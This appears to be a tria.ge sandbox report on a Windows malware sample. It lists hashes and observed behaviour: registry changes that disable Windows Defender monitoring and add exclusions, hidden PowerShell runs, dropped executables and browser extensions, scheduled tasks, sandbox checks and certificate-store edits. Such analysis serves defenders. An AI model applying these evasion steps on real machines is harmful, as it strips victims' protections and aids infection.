Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
218s -
max time network
249s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
01/07/2024, 05:06
Static task
static1
Behavioral task
behavioral1
Sample
ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
Resource
win7-20231129-en
General
-
Target
ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
-
Size
7.3MB
-
MD5
2e71f91c22ed33da2d442a0eb12fe951
-
SHA1
0c2eec9c3ff33ef905204a8ae205f533571a1cef
-
SHA256
ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b
-
SHA512
8602a9698c944d5962e190feb04b7ebb471a828f828e9b97c4a9352a45224935d2b9860b2d7d75ab03eb881e5eb380a11bb54ca3f2fa61e068d55882c5929269
-
SSDEEP
196608:91OFx9BggZVkFSL0ng/0O9pr89EDAtJ1i1Lzv0GB+grfTuD:3ODH30qD07sFzv3B+SC
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nIXneLoYhSqxVZkgocR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijGSqddcuZeU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wWtwQxeSPhIsC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijGSqddcuZeU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nIXneLoYhSqxVZkgocR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TuhNvssQnTUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rPjTFWmQUriHtIVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZDLVjxnHU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wWtwQxeSPhIsC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rPjTFWmQUriHtIVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TuhNvssQnTUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZDLVjxnHU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 34 768 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2308 powershell.exe 2572 powershell.exe 2832 powershell.EXE 1376 powershell.EXE 1592 powershell.exe 1500 powershell.EXE 2624 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation IbhinZm.exe -
Executes dropped EXE 4 IoCs
pid Process 2236 Install.exe 2744 Install.exe 2032 zxpwdlP.exe 1220 IbhinZm.exe -
Loads dropped DLL 23 IoCs
pid Process 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 2236 Install.exe 2236 Install.exe 2236 Install.exe 2236 Install.exe 2744 Install.exe 2744 Install.exe 2744 Install.exe 2472 WerFault.exe 2472 WerFault.exe 2472 WerFault.exe 768 rundll32.exe 768 rundll32.exe 768 rundll32.exe 768 rundll32.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 2708 WerFault.exe 2708 WerFault.exe 2708 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json IbhinZm.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json IbhinZm.exe -
Drops file in System32 directory 30 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 IbhinZm.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A9377E7E528F7E56B69A81C500ABC24 IbhinZm.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini zxpwdlP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 IbhinZm.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A9377E7E528F7E56B69A81C500ABC24 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol zxpwdlP.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 IbhinZm.exe File created C:\Windows\system32\GroupPolicy\gpt.ini zxpwdlP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IbhinZm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IbhinZm.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol zxpwdlP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 IbhinZm.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ijGSqddcuZeU2\uYUFrpwaZxCQI.dll IbhinZm.exe File created C:\Program Files (x86)\wWtwQxeSPhIsC\BkKLGDC.xml IbhinZm.exe File created C:\Program Files (x86)\ZDLVjxnHU\YFpaxQ.dll IbhinZm.exe File created C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\YtEWRmR.dll IbhinZm.exe File created C:\Program Files (x86)\wWtwQxeSPhIsC\uqugdoI.dll IbhinZm.exe File created C:\Program Files (x86)\TuhNvssQnTUn\VzZdgjl.dll IbhinZm.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IbhinZm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IbhinZm.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IbhinZm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IbhinZm.exe File created C:\Program Files (x86)\ZDLVjxnHU\friNppl.xml IbhinZm.exe File created C:\Program Files (x86)\ijGSqddcuZeU2\oEsyZtI.xml IbhinZm.exe File created C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\RHpapsr.xml IbhinZm.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\brlogsXZdQLKJRjYtj.job schtasks.exe File created C:\Windows\Tasks\bdmBPZkQYKMDiCzlG.job schtasks.exe File created C:\Windows\Tasks\tRbTscEIBTcXFpe.job schtasks.exe File created C:\Windows\Tasks\SQVSLJdEAqcPOSFTe.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2472 2032 WerFault.exe 41 1720 2744 WerFault.exe 29 2708 1220 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionTime = a06426cc74cbda01 IbhinZm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecision = "0" IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs IbhinZm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionTime = a06426cc74cbda01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\ee-11-a7-3b-9b-9c IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs IbhinZm.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 608781bb74cbda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadNetworkName = "Network 3" IbhinZm.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDetectedUrl rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000001b6cbb74cbda01 zxpwdlP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates IbhinZm.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" zxpwdlP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs IbhinZm.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing IbhinZm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionReason = "1" IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\ee-11-a7-3b-9b-9c rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs IbhinZm.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IbhinZm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs IbhinZm.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" zxpwdlP.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs IbhinZm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates IbhinZm.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C IbhinZm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b